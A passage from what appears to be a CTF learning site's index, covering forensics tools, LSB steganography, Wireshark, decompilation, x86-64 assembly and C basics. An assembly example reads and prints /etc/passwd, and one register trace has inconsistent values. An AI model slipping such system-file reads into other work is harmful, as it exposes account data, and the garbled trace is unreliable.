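print(identify(header))
```

For a file on disk, pass in the first few bytes, for instance open(path, 'rb').read(16).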
A hexadecimal (hex) editor (also called a binary file editor or byte editor) is a computer program you can use to manipulate the fundamental binary data that constitutes a computer file. The name \u201chex\u201d comes from \u201chexadecimal,\u201d a standard numerical format for representing binary data. A typical computer file occupies multiple areas on the platter(s) of a disk drive, whose contents are combined to form the file. Hex editors that are designed to parse and edit sector data from the physical segments of floppy or hard disks are sometimes called sector editors or disk editors. A hex editor is used to see or edit the raw, exact contents of a file. Hex editors may be used to correct data corrupted by a system or application. A list of editors can be found on the forensics Wiki. You can download one and install it on your system.
"}, {"location": "forensics/what-is-a-hex-editor/#example", "title": "Example", "text": "Open fileA.jpg in a hex editor. (Most Hex editors have either a \u201cFile > Open\u201d option or a simple drag and drop.)
When you open fileA.jpg in your hex editor, you should see something similar to this:
Your hex editor should also have a \u201cgo to\u201d or \u201cfind\u201d feature so you can jump to a specific byte.
"}, {"location": "forensics/what-is-disk-imaging/", "title": "Disk Imaging", "text": "A forensic image is an electronic copy of a drive (e.g. a hard drive, USB, etc.). It\u2019s a bit-by-\u00adbit or bitstream file that\u2019s an exact, unaltered copy of the media being duplicated.
Wikipedia said that the most straight\u00adforward disk imaging method is to read a disk from start to finish and write the data to a forensics image format. \u201cThis can be a time-consuming process, especially for disks with a large capacity,\u201d Wikipedia said.
To prevent write access to the disk, you can use a write blocker. It\u2019s also common to calculate a cryptographic hash of the entire disk when imaging it. \u201cCommonly-used cryptographic hashes are MD5, SHA1 and/or SHA256,\u201d said Wikipedia. \u201cBy recalculating the integrity hash at a later time, one can determine if the data in the disk image has been changed. This by itself provides no protection against intentional tampering, but it can indicate that the data was altered, e.g. due to corruption.\u201d
Why image a disk? Forensic imaging: - Prevents tampering with the original data evidence - Allows you to play around with the copy, without worrying about messing up the original
"}, {"location": "forensics/what-is-disk-imaging/#forensic-image-extraction-exmple", "title": "Forensic Image Extraction Exmple", "text": "This example uses the tool AccessData FTK Imager.
Step 1: Go to File > Create Disk Image
Step 2: Select Physical Drive
, because the USB or hard drive you\u2019re imaging is a physical device or drive.
Step 3: Select the drive you\u2019re imaging. The 1000 GB is my computer hard drive; the 128 MB is the USB that I want to image.
Step 4: Add a new image destination
Step 5: Select whichever image type you want. Choose Raw (dd)
if you\u2019re a beginner, since it\u2019s the most common type
Step 6: Fill in all the evidence information
Step 7: Choose where you want to store it
Step 8: The image destination has been added. Now you can start the image extraction
Step 9: Wait for the image to be extracted
Step 10: This is the completed extraction
Step 11: Add the image you just created so that you can view it
Step 12: This time, choose image file, since that\u2019s what you just created
Step 13: Enter the path of the image you just created
Step 14: View the image.
Step 15: To view files in the USB, go to Partition 1 > [USB name] > [root]
in the Evidence Tree and look in the File List
Step 16: Selecting fileA, fileB, fileC, or fileD gives us some properties of the files & a preview of each photo
Step 17: Extract files of interest for further analysis by selecting, right-clicking and choosing Export Files
There are plenty of traces of someone's activity on a computer, but perhaps some of the most valuable information can be found within memory dumps, that is, images taken of RAM. These dumps of data are often very large, but can be analyzed using a tool called Volatility.
"}, {"location": "forensics/what-is-memory-forensics/#volatility-basics", "title": "Volatility Basics", "text": "Memory forensics isn't all that complicated; the hardest part is using your toolset correctly. A good workflow is as follows:
strings
for clues
In order to properly use Volatility you must supply a profile with --profile=PROFILE
, therefore before any sleuthing, you need to determine the profile using imageinfo:
$ python vol.py -f ~/image.raw imageinfo\nVolatility Foundation Volatility Framework 2.4\nDetermining profile based on KDBG search...\n\n Suggested Profile(s) : Win7SP0x64, Win7SP1x64, Win2008R2SP0x64, Win2008R2SP1x64\n AS Layer1 : AMD64PagedMemory (Kernel AS)\n AS Layer2 : FileAddressSpace (/Users/Michael/Desktop/win7_trial_64bit.raw)\n PAE type : PAE\n DTB : 0x187000L\n KDBG : 0xf80002803070\n Number of Processors : 1\n Image Type (Service Pack) : 0\n KPCR for CPU 0 : 0xfffff80002804d00L\n KUSER_SHARED_DATA : 0xfffff78000000000L\n Image date and time : 2012-02-22 11:29:02 UTC+0000\n Image local date and time : 2012-02-22 03:29:02 -0800\n
"}, {"location": "forensics/what-is-memory-forensics/#dump-processes", "title": "Dump Processes", "text": "In order to view processes, the pslist
or pstree
or psscan
command can be used.
$ python vol.py -f ~/image.raw --profile=Win7SP0x64 pslist\nVolatility Foundation Volatility Framework 2.5\nOffset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit\n------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------\n0xffffa0ee12532180 System 4 0 108 0 ------ 0 2018-04-22 20:02:33 UTC+0000\n0xffffa0ee1389d040 smss.exe 232 4 3 0 ------ 0 2018-04-22 20:02:33 UTC+0000\n...\n0xffffa0ee128c6780 VBoxTray.exe 3324 1123 10 0 1 0 2018-04-22 20:02:55 UTC+0000\n0xffffa0ee14108780 OneDrive.exe 1422 1123 10 0 1 1 2018-04-22 20:02:55 UTC+0000\n0xffffa0ee14ade080 svchost.exe 228 121 1 0 1 0 2018-04-22 20:14:43 UTC+0000\n0xffffa0ee1122b080 notepad.exe 2019 1123 1 0 1 0 2018-04-22 20:14:49 UTC+0000\n
"}, {"location": "forensics/what-is-memory-forensics/#process-memory-dump", "title": "Process Memory Dump", "text": "Dumping the memory of a process can prove to be fruitful, say we want to dump the data from notepad.exe:
$ python vol.py -f ~/image.raw --profile=Win7SP0x64 memdump -p 2019 -D dump/\nVolatility Foundation Volatility Framework 2.4\n************************************************************************\nWriting notepad.exe [ 2019] to 2019.dmp\n\n$ ls -alh dump/2019.dmp\n-rw-r--r-- 1 user staff 111M Apr 22 20:47 dump/2019.dmp\n
"}, {"location": "forensics/what-is-memory-forensics/#other-useful-commands", "title": "Other Useful Commands", "text": "There are plenty of commands that Volatility offers but some highlights include:
$ python vol.py -f IMAGE --profile=PROFILE connections
: view network connections
$ python vol.py -f IMAGE --profile=PROFILE cmdscan
: view commands that were run in cmd prompt
Metadata is data about data. Different types of files have different metadata. The metadata on a photo could include dates, camera information, GPS location, comments, etc. For music, it could include the title, author, track number and album.
"}, {"location": "forensics/what-is-metadata/#what-kind-of-file-metadata-is-useful", "title": "What kind of file metadata is useful?", "text": "Potentially, any file metadata you can find could be useful.
"}, {"location": "forensics/what-is-metadata/#how-do-i-find-it", "title": "How do I find it?", "text": "Note
EXIF Data is metadata attached to photos which can include location, time, and device information.
One of our favorite tools is exiftool, which displays metadata for an input file, including: - File size - Dimensions (width and height) - File type - Programs used to create (e.g. Photoshop) - OS used to create (e.g. Apple)
Run command line: exiftool(-k).exe [filename]
and you should see something like this:
Let's take a look at File A's metadata with exiftool:
File type
Image description
Make and camera info
GPS Latitude/Longitude
"}, {"location": "forensics/what-is-metadata/#timestamps", "title": "Timestamps", "text": "Timestamps are data that indicate the time of certain events (MAC): - Modification \u2013 when a file was modified - Access \u2013 when a file or entries were read or accessed - Creation \u2013 when files or entries were created
"}, {"location": "forensics/what-is-metadata/#types-of-timestamps", "title": "Types of timestamps", "text": "Certain events such as creating, moving, copying, opening, editing, etc. might affect the MAC times. If the MAC timestamps can be attained, a timeline of events could be created.
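As a rough sketch of how MAC times can be read programmatically, the Python snippet below uses the standard os.stat call. The helper name mac_times is made up for this illustration. Note that st_ctime is the metadata-change time on Unix but the creation time on Windows, so the third value depends on the platform.

```python
import os
from datetime import datetime, timezone


def mac_times(path):
    # Hypothetical helper: return the three timestamps as UTC datetimes.
    info = os.stat(path)

    def to_utc(seconds):
        return datetime.fromtimestamp(seconds, tz=timezone.utc)

    return {
        'modified': to_utc(info.st_mtime),
        'accessed': to_utc(info.st_atime),
        # Creation time on Windows, metadata-change time on Unix.
        'created_or_changed': to_utc(info.st_ctime),
    }


# Print the timestamps of the current directory as a quick demonstration.
for name, stamp in mac_times('.').items():
    print(name, stamp.isoformat())
```

Sorting the values collected from several files is one simple way to start building the timeline described above.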
"}, {"location": "forensics/what-is-metadata/#timeline-patterns", "title": "Timeline Patterns", "text": "There are plenty more patterns than the ones introduced below, but these are the basics you should start with to get a good understanding of how it works, and to complete this challenge.
"}, {"location": "forensics/what-is-metadata/#examples", "title": "Examples", "text": "
We know that the BMP files fileA and fileD are the same, but that the JPEG files fileB and fileC are different somehow. So how can we find out what went on with these files?
By using timestamp information from the file system, we can learn that the BMP fileD was the original file, with fileA being a copy of the original. Afterward, fileB was created by modifying fileA, and fileC was created by modifying fileA in a different way.
Follow along as we demonstrate.
We\u2019ll start by analyzing images in AccessData FTK Imager, where there\u2019s a Properties window that shows you some information about the file or folder you\u2019ve selected.
Here are the extracted MAC times for fileA, fileB, fileC and fileD. Note: AccessData FTK Imager assumes that the file times on the drive are in UTC (Coordinated Universal Time). I subtracted four hours, since the USB was set up in Eastern Standard Time. This isn\u2019t necessary, but it helps me understand the times a bit better.
Highlight timestamps that are the same. If timestamps are off by only a few seconds, they should be counted as the same. This lets you see a clear difference between different timestamps. Then, highlight oldest to newest to help put them in order.
Identify timestamp patterns.
"}, {"location": "forensics/what-is-stegonagraphy/", "title": "Steganography", "text": "Steganography is the practice of hiding data in plain sight. The hidden data is often embedded in images or audio.
You could send a picture of a cat to a friend and hide text inside. Looking at the image, there\u2019s nothing to make anyone think there\u2019s a message hidden inside it.
You could also hide a second image inside the first.
"}, {"location": "forensics/what-is-stegonagraphy/#steganography-detection", "title": "Steganography Detection", "text": "So we can hide text and an image. How do we find out if there is hidden data?
FileA and FileD appear the same, but they\u2019re different. Also, FileD was modified after it was copied, so it\u2019s possible there might be steganography in it.
FileB and FileC don\u2019t appear to have been modified after being created. That doesn\u2019t rule out the possibility that there\u2019s steganography in them, but you\u2019re more likely to find it in fileD. This brings up two questions:
Files are made of bytes. Each byte is composed of eight bits.
Changing the least-significant bit (LSB) doesn\u2019t change the value very much.
So we can modify the LSB without changing the file noticeably. By doing so, we can hide a message inside.
"}, {"location": "forensics/what-is-stegonagraphy/#lsb-steganography-in-images", "title": "LSB Steganography in Images", "text": "LSB Steganography or Least Significant Bit Steganography is a method of Steganography where data is recorded in the lowest bit of a byte.
Say an image has a pixel with an RGB value of (255, 255, 255). The bits of each of those RGB values will look like
1 1 1 1 1 1 1 1
By modifying the lowest, or least significant, bit, we can use the 1 bit space across every RGB value for every pixel to construct a message.
1 1 1 1 1 1 1 0
Steganography is hard to detect by sight because a 1 bit difference in color is insignificant, as seen below.
"}, {"location": "forensics/what-is-stegonagraphy/#example", "title": "Example", "text": "Let\u2019s say we have an image, and part of it contains the following binary:
And let\u2019s say we want to hide the character y inside.
First, we need to convert the hidden message to binary.
Now we take each bit from the hidden message and replace the LSB of the corresponding byte with it.
And again:
And again:
And again:
And again:
And again:
And again:
And once more:
Decoding LSB steganography is exactly the same as encoding, but in reverse. For each byte, grab the LSB and add it to your decoded message. Once you\u2019ve gone through each byte, convert all the LSBs you grabbed into text or a file. (You can use your file signature knowledge here!)
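The encoding and decoding steps above can be sketched in Python as follows. This is a minimal illustration that works on raw bytes, not on a real image format. The function names hide_bits and recover_bits are made up for this example, and the cover data is assumed to be eight colour values of 255.

```python
def hide_bits(cover, message):
    # Replace the LSB of each cover byte with one bit of the message,
    # taking the most significant bit of each message byte first.
    bits = [(byte >> shift) & 1 for byte in message for shift in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError('cover data is too small for the message')
    stego = bytearray(cover)
    for index, bit in enumerate(bits):
        stego[index] = (stego[index] & 0xFE) | bit
    return bytes(stego)


def recover_bits(stego, length):
    # Collect the LSBs and pack every eight of them back into one byte.
    out = bytearray()
    for start in range(0, length * 8, 8):
        value = 0
        for byte in stego[start:start + 8]:
            value = (value << 1) | (byte & 1)
        out.append(value)
    return bytes(out)


cover = bytes([255] * 8)          # assumed cover data: eight colour values
stego = hide_bits(cover, b'y')    # the character y is 0x79, or 01111001
print(list(stego))
print(recover_bits(stego, 1))
```

Each cover byte changes by at most one, which is why the altered image looks the same to the eye.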
"}, {"location": "forensics/what-is-stegonagraphy/#what-other-types-of-steganography-are-there", "title": "What other types of steganography are there?", "text": "Steganography is hard for the defense side, because there\u2019s practically an infinite number of ways it could be carried out. Here are a few examples: - LSB steganography: different bits, different bit combinations - Encode in every certain number of bytes - Use a password - Hide in different places - Use encryption on top of steganography
"}, {"location": "forensics/what-is-wireshark/", "title": "Wireshark", "text": "Note from our infrastructure team
\"Wireshark saved me hours on my last tax return! - David\"
\"[Wireshark] is great for ruining your weekend and fixing pesky networking problems! - Max\"
\"Wireshark is the powerhouse of the cell. - Joe\"
\"Does this cable do anything? - Ayyaz\"
Wireshark is a network protocol analyzer which is often used in CTF challenges to look at recorded network traffic. Wireshark uses a filetype called PCAP to record traffic. PCAPs are often distributed in CTF challenges to provide recorded traffic history.
"}, {"location": "forensics/what-is-wireshark/#interface", "title": "Interface", "text": "Upon opening Wireshark, you are greeted with the option to open a PCAP or begin capturing network traffic on your device.
The network traffic displayed initially shows the packets in the order in which they were captured. You can filter packets by protocol, source IP address, destination IP address, length, etc.
In order to apply filters, simply enter the constraining factor, for example 'http', in the display filter bar.
Filters can be chained together using '&&' notation. In order to filter by IP, ensure a double equals '==' is used.
The most pertinent part of a packet is its data payload and protocol information.
"}, {"location": "forensics/what-is-wireshark/#decrypting-ssl-traffic", "title": "Decrypting SSL Traffic", "text": "By default, Wireshark cannot decrypt SSL traffic on your device unless you grant it specific certificates.
"}, {"location": "forensics/what-is-wireshark/#high-level-ssl-handshake-overview", "title": "High Level SSL Handshake Overview", "text": "In order for a network session to be encrypted properly, the client and server must share a common secret which they can use to encrypt and decrypt data without someone in the middle being able to guess it. The SSL Handshake loosely follows this format:
There are several ways to decrypt traffic.
Reverse Engineering in a CTF is typically the process of taking a compiled (machine code, bytecode) program and converting it back into a more human readable format.
Very often the goal of a reverse engineering challenge is to understand the functionality of a given program such that you can identify deeper issues.
Decompilers do the impossible and reverse compiled code back into pseudocode/code.
IDA offers HexRays, which translates machine code into a higher language pseudocode.
"}, {"location": "reverse-engineering/what-are-decompilers/#example-workflow", "title": "Example Workflow", "text": "Let's say we are disassembling a program which has the source code:
#include <stdio.h>\n\nvoid printSpacer(int num){\n for(int i = 0; i < num; ++i){\n printf(\"-\");\n }\n printf(\"\\n\");\n}\n\nint main()\n{\n char* string = \"Hello, World!\";\n for(int i = 0; i < 13; ++i){\n printf(\"%c\", string[i]);\n for(int j = i+1; j < 13; j++){\n printf(\"%c\", string[j]);\n }\n printf(\"\\n\");\n printSpacer(13 - i);\n }\n return 0;\n}\n
And creates an output of:
Hello, World!\n-------------\nello, World!\n------------\nllo, World!\n-----------\nlo, World!\n----------\no, World!\n---------\n, World!\n--------\n World!\n-------\nWorld!\n------\norld!\n-----\nrld!\n----\nld!\n---\nd!\n--\n!\n-\n
If we are given a binary compiled from that source and we want to figure out how the source looks, we can use a decompiler to get C pseudocode which we can then use to reconstruct the function. The sample decompilation can look like:
printSpacer:\nint __fastcall printSpacer(int a1)\n{\n int i; // [rsp+8h] [rbp-8h]\n\n for ( i = 0; i < a1; ++i )\n printf(\"-\");\n return printf(\"\\n\");\n}\n\nmain:\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n int v4; // [rsp+18h] [rbp-18h]\n signed int i; // [rsp+1Ch] [rbp-14h]\n\n for ( i = 0; i < 13; ++i )\n {\n v4 = i + 1;\n printf(\"%c\", (unsigned int)aHelloWorld[i], envp);\n while ( v4 < 13 )\n printf(\"%c\", (unsigned int)aHelloWorld[v4++]);\n printf(\"\\n\");\n printSpacer(13 - i);\n }\n return 0;\n}\n
A good method of getting a good representation of the source is to convert the decompilation into Python, since Python is basically pseudocode that runs. Starting with main often allows you to gain a good overview of what the program is doing and will help you translate the other functions.
"}, {"location": "reverse-engineering/what-are-decompilers/#main", "title": "Main", "text": "We know we will start with a main function and some variables. If you trace the execution of the variables, you can oftentimes determine the variable type. Because i is being used as an index, we know it's an int, and because v4 is used as one later on, it too is an index. We can also see that a variable aHelloWorld is being printed with \"%c\", so we can determine that it represents the 'Hello, World!' string. Let's define all these variables in our Python main function:
def main():\n string = \"Hello, World!\"\n i = 0\n v4 = 0\n for i in range(0, 13):\n v4 = i + 1\n print(string[i], end='')\n while v4 < 13:\n print(string[v4], end='')\n v4 += 1\n print()\n printSpacer(13-i)\n
"}, {"location": "reverse-engineering/what-are-decompilers/#printspacer-function", "title": "printSpacer Function", "text": "Now we can see that printSpacer is clearly being fed an int value. Translating it into Python shouldn't be too hard.
def printSpacer(number):\n i = 0\n for i in range(0, number):\n print(\"-\", end='')\n print()\n
"}, {"location": "reverse-engineering/what-are-decompilers/#results", "title": "Results", "text": "Running main() gives us:
Hello, World!\n-------------\nello, World!\n------------\nllo, World!\n-----------\nlo, World!\n----------\no, World!\n---------\n, World!\n--------\n World!\n-------\nWorld!\n------\norld!\n-----\nrld!\n----\nld!\n---\nd!\n--\n!\n-\n
"}, {"location": "reverse-engineering/what-are-disassemblers/", "title": "Disassemblers", "text": "A disassembler is a tool which translates the machine code of a compiled program into assembly.
"}, {"location": "reverse-engineering/what-are-disassemblers/#list-of-disassemblers", "title": "List of Disassemblers", "text": "The Interactive Disassembler (IDA) is the industry standard for binary disassembly. IDA is capable of disassembling \"virtually any popular file format\". This makes it very useful to security researchers and CTF players who often need to analyze obscure files without knowing what they are or where they came from. IDA also features the industry leading Hex Rays decompiler which can convert assembly code back into a pseudo code like format.
IDA also has a plugin interface which has been used to create some successful plugins that can make reverse engineering easier:
Binary Ninja is an up and coming disassembler that attempts to bring a new, more programmatic approach to reverse engineering. Binary Ninja brings an improved plugin API and modern features to reverse engineering. While it's neither as popular nor as old as IDA, Binary Ninja (often called binja) is quickly gaining ground and has a small community of dedicated users and followers.
Binja also has some community contributed plugins which are collected here: https://github.com/Vector35/community-plugins
"}, {"location": "reverse-engineering/what-are-disassemblers/#gdb", "title": "gdb", "text": "The GNU Debugger is a free and open source debugger which also disassembles programs. It's capable as a disassembler, but most notably it is used by CTF players for its debugging and dynamic analysis capabilities.
gdb is often used in tandem with enhancement scripts like peda, pwndbg, and GEF.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/", "title": "Assembly/Machine Code", "text": "Machine Code or Assembly is code which has been formatted for direct execution by a CPU. Machine Code is the reason why readable programming languages like C, when compiled, cannot be reversed into source code (well Decompilers can sort of, but more on that later).
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#from-source-to-compilation", "title": "From Source to Compilation", "text": "Godbolt shows the differences in machine code generated by various compilers.
For example, if we have a simple C++ function:
#include <unistd.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nint main() {\n char c;\n int fd = syscall(2, \"/etc/passwd\", 0);\n while (syscall(0, fd, &c, 1)) {\n putchar(c);\n }\n}\n
We can see the compilation results in some verbose instructions for the CPU:
.LC0:\n .string \"/etc/passwd\"\nmain:\n push rbp\n mov rbp, rsp\n sub rsp, 16\n mov edx, 0\n mov esi, OFFSET FLAT:.LC0\n mov edi, 2\n mov eax, 0\n call syscall\n mov DWORD PTR [rbp-4], eax\n.L3:\n lea rdx, [rbp-5]\n mov eax, DWORD PTR [rbp-4]\n mov ecx, 1\n mov esi, eax\n mov edi, 0\n mov eax, 0\n call syscall\n test rax, rax\n setne al\n test al, al\n je .L2\n movzx eax, BYTE PTR [rbp-5]\n movsx eax, al\n mov edi, eax\n call putchar\n jmp .L3\n.L2:\n mov eax, 0\n leave\n ret\n
This is a one way process for compiled languages as there is no way to generate source from machine code. While the machine code may seem unintelligible, the extremely basic functions can be interpreted with some practice.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#x86-64", "title": "x86-64", "text": "x86-64 or amd64 or i64 is a 64-bit Complex Instruction Set Computing (CISC) architecture. This basically means that the registers used for this architecture extend an extra 32 bits on Intel's x86 architecture. CISC means that a single instruction can do a bunch of different things at once, such as memory accesses, register reads, etc. It is also a variable-length instruction set, which means different instructions can be different sizes ranging from 1 to 15 bytes long. And finally x86-64 allows for multi-sized register access, which means that you can access certain parts of a register which are different sizes.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#x86-64-registers", "title": "x86-64 Registers", "text": "x86-64 registers behave similarly to other architectures. A key component of x86-64 registers is multi-sized access which means the register RAX can have its lower 32 bits accessed with EAX. The next lower 16 bits can be accessed with AX and the lowest 8 bits can be accessed with AL which allows for the compiler to make optimizations which boost program execution.
x86-64 has plenty of registers to use, including rax, rbx, rcx, rdx, rdi, rsi, rsp, rip, r8-r15, and more! But some registers serve special purposes.
The special registers include: - RIP: the instruction pointer - RSP: the stack pointer - RBP: the base pointer
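The multi-sized access described above can be modelled with bit masks. The Python sketch below is only an illustration: the function name register_views and the sample value are made up, and it shows just the RAX, EAX, AX and AL views mentioned in the text.

```python
def register_views(rax):
    # Model a 64-bit RAX value and the narrower views of its low bits.
    rax &= 0xFFFFFFFFFFFFFFFF
    return {
        'rax': rax,
        'eax': rax & 0xFFFFFFFF,   # lower 32 bits
        'ax': rax & 0xFFFF,        # lower 16 bits
        'al': rax & 0xFF,          # lowest 8 bits
    }


for name, value in register_views(0x1122334455667788).items():
    print(name, hex(value))
```

Every narrower name is a window onto the same storage, so changing AL also changes the low byte of RAX.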
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#instructions", "title": "Instructions", "text": "An instruction represents a single operation for the CPU to perform.
There are different types of instructions including:
mov rax, [rsp - 0x40]
add rbx, rcx
jne 0x8000400
Because x86-64 is a CISC architecture, instructions can be quite complex for machine code, such as repne scasb
which repeats up to ECX times over memory at EDI looking for a NULL byte (0x00), decrementing ECX each byte (essentially strlen() in a single instruction!).
It is important to remember that an instruction really is just memory; this idea will become useful with Return Oriented Programming or ROP.
Note
Instructions, numbers, strings: everything is always represented in hex!
add rax, rbx == 48 01 d8\nmov rax, 0xdeadbeef == 48 c7 c0 ef be ad de\nmov rax, [0xdeadbeef] == 67 48 8b 05 ef be ad de\n\"Hello\" == 48 65 6c 6c 6f\n
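Two of the byte sequences above can be reproduced with a few lines of Python. This is a small sketch that assumes Python 3.8 or newer, where bytes.hex accepts a separator. It also shows why 0xdeadbeef appears as ef be ad de inside the encoded instructions: x86-64 stores multi-byte numbers in little-endian order.

```python
# The ASCII bytes of the string, printed as hex.
text = 'Hello'.encode('ascii').hex(' ')

# The 32-bit number 0xdeadbeef laid out in little-endian byte order.
immediate = (0xdeadbeef).to_bytes(4, 'little').hex(' ')

print(text)
print(immediate)
```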
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#execution", "title": "Execution", "text": "What should the CPU execute? This is determined by the RIP register where IP means instruction pointer. Execution follows the pattern: fetch the instruction at the address in RIP, decode it, run it.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#examples", "title": "Examples", "text": "mov rax, 0xdeadbeef
Here the operation mov
is moving the \"immediate\" 0xdeadbeef
into the register RAX
mov rax, [0xdeadbeef + rbx * 4]
Here the operation mov
is moving the data at the address of [0xdeadbeef + RBX*4]
into the register RAX
. When brackets are used, you can think of the program as getting the content from that effective address.
-> 0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804000\n 0x080400a: add, rax, rbx RAX = 0x0\n 0x080400d: inc rbx RBX = 0x0\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n-> 0x0804005: mov ebx, 0x1234 RIP = 0x0804005\n 0x080400a: add, rax, rbx RAX = 0xdeadbeef\n 0x080400d: inc rbx RBX = 0x0\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x080400a\n-> 0x080400a: add, rax, rbx RAX = 0xdeadbeef\n 0x080400d: inc rbx RBX = 0x1234\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x080400d\n 0x080400a: add, rax, rbx RAX = 0xdeadd123\n-> 0x080400d: inc rbx RBX = 0x1234\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804010\n 0x080400a: add, rax, rbx RAX = 0xdeadd123\n 0x080400d: inc rbx RBX = 0x1235\n-> 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804013\n 0x080400a: add, rax, rbx RAX = 0xdeadbeee\n 0x080400d: inc rbx RBX = 0x1235\n 0x0804010: sub rax, rbx RCX = 0x0\n-> 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804005\n 0x080400a: add, rax, rbx RAX = 0xdeadbeee\n 0x080400d: inc rbx RBX = 0x1235\n 0x0804010: sub rax, rbx RCX = 0xdeadbeee\n 0x0804013: mov rcx, rax RDX = 0x0\n
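To check the register values in the trace above, the six instructions can be replayed with a tiny interpreter. The Python sketch below is a toy model, not an emulator: the tuple format and the names operand and run are invented for this example. It treats the 32-bit writes to eax and ebx as writes to rax and rbx, which matches real behaviour because a 32-bit write zeroes the upper half of the register.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF


def operand(regs, value):
    # An operand is either a register name or an immediate integer.
    return regs[value] if isinstance(value, str) else value


def run(program):
    regs = {'rax': 0, 'rbx': 0, 'rcx': 0, 'rdx': 0}
    for op, dst, src in program:
        if op == 'mov':
            regs[dst] = operand(regs, src)
        elif op == 'add':
            regs[dst] = regs[dst] + operand(regs, src)
        elif op == 'sub':
            regs[dst] = regs[dst] - operand(regs, src)
        elif op == 'inc':
            regs[dst] = regs[dst] + 1
        else:
            raise ValueError('unsupported instruction: ' + op)
        regs[dst] &= MASK64  # registers wrap around at 64 bits
    return regs


program = [
    ('mov', 'rax', 0xdeadbeef),
    ('mov', 'rbx', 0x1234),
    ('add', 'rax', 'rbx'),
    ('inc', 'rbx', None),
    ('sub', 'rax', 'rbx'),
    ('mov', 'rcx', 'rax'),
]
for name, value in run(program).items():
    print(name, hex(value))
```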
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#control-flow", "title": "Control Flow", "text": "How can we express conditionals in x86-64? We use conditional jumps such as:
jnz <address>
je <address>
jge <address>
jle <address>
They jump if their condition is true, and just go to the next instruction otherwise. These conditionals check EFLAGS, a special register which stores flags set by certain instructions such as add rax, rbx
which sets the o (overflow) flag if the sum is greater than a 64-bit register can hold, and wraps around. You can jump based on that with a jo
instruction. The most important thing to remember is the cmp instruction:
cmp rax, rbx\njle error\n
This assembly jumps if RAX <= RBX"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#addresses", "title": "Addresses", "text": "Memory acts similarly to a big array where the indices of this \"array\" are memory addresses. Remember from earlier:
mov rax, [0xdeadbeef]
The square brackets mean \"get the data at this address\". This is analogous to the C/C++ syntax: rax = *0xdeadbeef;
The C programming language was written by Dennis Ritchie in the 1970s while he was working at Bell Labs. It was first used to reimplement the Unix operating system which was purely written in assembly language. At first, the Unix developers were considering using a language called \"B\" but because B wasn't optimized for the target computer, the C language was created.
Note
C is the letter and the programming language after B!
C was designed to be close to assembly and is still widely used in lower level programming where speed and control are needed (operating systems, embedded systems). C was also very influential to other programming languages used today. Notable languages include C++, Objective-C, Golang, Java, JavaScript, PHP, Python, and Rust.
"}, {"location": "reverse-engineering/what-is-c/#hello-world", "title": "Hello World", "text": "C is an ancestor of many other programming languages and if you are familiar with programming, it's likely that C will be at least somewhat familiar.
#include <stdio.h>\nint main()\n{\n printf(\"Hello, World!\");\n return 0;\n}\n
"}, {"location": "reverse-engineering/what-is-c/#today", "title": "Today", "text": "Today C is widely used either as a low level programming language or is the base language that other programming languages are implemented in.
While it can be difficult to see, the C language compiles down directly into machine code. The compiler is programmed to process the provided C code and emit assembly that's targeted to whatever operating system and architecture the compiler is set to use.
Some common compilers include:
A good way to explore this relationship is to use this online GCC Explorer from Matt Godbolt.
With regard to CTFs, many reverse engineering and exploitation challenges are written in C because the language compiles down directly to assembly and has few to no built-in safeguards. This means developers must handle memory management and safety checks manually. Of course, this can lead to mistakes, which can in turn lead to security issues.
Note
Other higher level languages like Python manage memory and garbage collection for you. Google Golang was inspired by C, but adds in functionality like garbage collection and memory safety.
There are some examples of famously vulnerable functions in C which are still available and can still result in vulnerabilities:
gets
- Can result in buffer overflows
strcpy
- Can result in buffer overflows
strcat
- Can result in buffer overflows
strcmp
- Can result in timing attacks
C has four basic types:
C uses an idea known as pointers. A pointer is a variable which contains the address of another variable.
To understand this idea we should first understand that memory is laid out in terms of addresses and data gets stored at these addresses.
Take the following example of defining an integer in C:
int x = 4;\n
To the programmer this is the variable x
receiving the value of 4. The computer stores this value in some location in memory. For example we can say that address 0x1000
now holds the value 4
. The computer knows to directly access the memory and retrieve the value 4
whenever the programmer tries to use the x
variable. If we were to say x + 4
, the computer would give you 8
instead of 0x1004
.
But in C we can retrieve the memory address being used to hold the 4 value (i.e. 0x1000) by using the &
character and using *
to create an \"integer pointer\" type.
int* y = &x;\n
The y
variable will store the address of the x
variable (0x1000).
Note
The *
character allows us to declare pointer variables but also allows us to access the value stored at a pointer. For example, entering *y
allows us to access the 4 value instead of 0x1000.
Whenever we use the y
variable we are using the memory address, but if we use the x
variable we use the value stored at the memory address.
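The relationship between x, the address of x and the pointer y can also be explored from Python using the standard ctypes module. This is only a sketch to mirror the C lines above. The printed address will differ on every run and will not be 0x1000.

```python
import ctypes

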